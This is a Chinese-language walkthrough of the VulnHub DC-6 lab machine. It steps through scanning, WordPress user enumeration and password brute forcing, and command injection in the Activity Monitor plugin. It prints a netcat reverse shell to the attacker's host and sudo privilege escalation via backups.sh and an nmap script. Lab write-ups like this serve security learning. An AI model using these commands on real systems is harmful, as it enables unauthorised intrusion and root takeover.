Stand Out Fit In
0x00 环境准备
Kali Linux(IP:10.10.16.128)
DC-6 靶机
NAT 网络连接
0x01 主机发现
fping -g 10.10.16.0/24
得到靶机的 IP:10.10.16.149
0x02 端口扫描
nmap -A -v -sS -sV -p- -T4 10.10.16.149
得到 22/80 端口
0x03 目录爆破
dirb http://10.10.16.149
得到 wp-admin/wp-content/wp-includes 目录
0x04 漏洞挖掘
1. 靶机访问
发现页面重定向到 http://wordy
Hosts文件主要作用是定义IP地址和主机名的映射关系,是一个映射IP地址和主机名的规定。
当用户在浏览器中输入一个需要登录的网址时,系统会首先自动从 Hosts 文件中寻找对应的 IP 地址,一旦找到,浏览器会立即打开对应网页,如果没有找到,则浏览器会将网址提交 DNS 服务器进行 IP 地址解析。
很明显,在本地的 hosts 文件中没有对靶机的地址和 worrdy 域名做一个映射,DNS 服务器也无法进行 IP 地址解析,所以需要在 hosts 文件中对其添加如下的映射
10.10.16.149 wordy
windows 下的 hosts 文件路径为 C:\Windows\System32\drivers\etc\hosts ,hosts 文件一定是在系统盘里,且需要管理员权限才能操作,可以先以管理员权限打开记事本,再通过记事本打开 hosts 文件,添加地址的映射。
Linux 下的 hosts 文件在 /etc/hosts
2. 目录访问
发现 /wp-admin 重定向到一个用户登录界面
3. 网站扫描
由 wappalyzer 插件得知该网站为 WordPress 搭建的博客系统。
可以使用 wpscan 或 cmsmap 对 WordPress 搭建的网站进行漏扫。
wpscan --url http://wordy --enumerate vp --enumerate vt --enumerate u
下面是 wpscan 使用的几个参数的作用
插件和主题的漏洞没扫着,但得到几个 wordpress 建站的常见用户名,将其保存在文件夹 zhutou.txt 中以便后面利用。
在 vulnhub 中作者提供了一条线索,意为将 Kali 自带的 rockyou.txt 字典中包含有 k01 的字符串挑选出来,保存在 passwords.txt 文件中
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
wpscan 爆破,得到一个用户名/密码:mark/helpdesk01
wpscan --url http://wordy -P passwords.txt -U 桌面/zhutou.txt
将得到的用户名/密码在前面目录扫描得到的用户登录界面登录,在 Activity monitor – Activity monitor – Tools – IP or integer 的输入框中,由于后台没有对用户输入参数进行过滤或过滤不严,导致用户可以任意数据,直接造成远程代码执行漏洞
127.0.0.1 | ls
0x05 漏洞利用
- 先在 Kali 使用 netcat 监听端口,再在 burpsuite 中反弹 shell
127.0.0.1 | nc -e /bin/bash 10.10.16.128 666
- 在 /home/mark/stuff/things-to-do.txt 得到另一个用户的密码
- 用户切换 su,查看当前用户的权限,发现可以以 jens 用户的权限操作 /home/jens 目录下的 backups.sh 文件
- 进入 /home/jens 目录下,在 backups.sh 文件末尾添加 /bin/bash ,当执行 backups.sh 文件时可切换至 jens 用户
echo "/bin/bash" >> backups.sh
sudo -u jens ./backups.sh
- 继续查看 jens 用户下可有什么权限,发现可以免密使用 root 权限执行 /usr/bin/nmap
- nmap 可以执行脚本文件,可以创建一个文件并写入反弹 shell 的命令,因为这是以 root 权限执行,所以反弹的 shell 也应该是 root 权限
echo 'os.execute("/bin/sh")' > shell
sudo -u root nmap --script=shell
补充:
- 反弹 shell 的另一种方式使用 Poc,原理与上面相同,就是利用的途径有所不同
寻找有关 activity monitor 插件的漏洞 exp ,将其拷贝到 /tmp 目录下,开启 http 服务,以便浏览器访问 poc
searchsploit activity monitor
cp /usr/share/exploitdb/exploits/php/webapps/45274.html /tmp
cd /tmp
python -m SimpleHTTPServer 80
- 浏览器访问 poc ,在 Kali 先开启监听,点击 Submit request,即可反弹 shell 成功
http://10.10.16.128/45274.html
猪头
2020.3.4